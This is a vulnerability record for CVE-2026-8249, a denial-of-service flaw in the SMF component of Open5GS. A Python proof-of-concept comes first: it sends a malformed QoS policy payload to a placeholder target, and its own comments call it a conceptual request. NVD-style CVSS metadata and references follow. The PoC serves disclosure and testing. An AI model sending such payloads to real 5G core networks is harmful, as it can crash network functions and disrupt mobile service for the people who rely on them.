CVE-2026-8249

#!/usr/bin/env python3 # PoC for CVE-2026-8249 (Open5GS DoS) # Target: Open5GS SMF Component import requests import json # Replace with the actual target IP and port of the Open5GS SMF # SMF typically exposes an SBI interface (HTTP/2) target_url = "http://<TARGET_IP>:<PORT>/npcf-smpolicycontrol/v1/sm-policies" # Malformed payload designed to trigger the flaw in update_authorized_pcc_rule_and_qos # This payload simulates a corrupted QoS update request malicious_payload = { "invalid_qos": { "5qi": -1, # Invalid QoS Flow Identifier "arp": { "priority_level": 999, # Out of bounds priority "preempt_cap": "INVALID_VALUE", "preempt_vuln": "INVALID_VALUE" } }, "session_rules": [ { "auth_sess_ambr": { "uplink": "999999999999999999999", # Extremely large value "downlink": "999999999999999999999" } } ] } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-8249-PoC" } try: print(f"[*] Sending payload to {target_url}...") # Note: Open5GS SBI often uses HTTP/2, standard requests library might need http2 adapter. # This is a conceptual representation of the request. response = requests.post(target_url, data=json.dumps(malicious_payload), headers=headers, timeout=5) print(f"[*] Response status code: {response.status_code}") print("[*] If the service crashes, the vulnerability is confirmed.") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-8249", "sourceIdentifier": "[email protected]", "published": "2026-05-10T23:16:27.243", "lastModified": "2026-05-11T16:17:42.180", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Open5GS up to 2.7.7. The impacted element is the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. This manipulation causes denial of service. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/issues/4443", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808473", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362546", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362546/cti", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808473", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}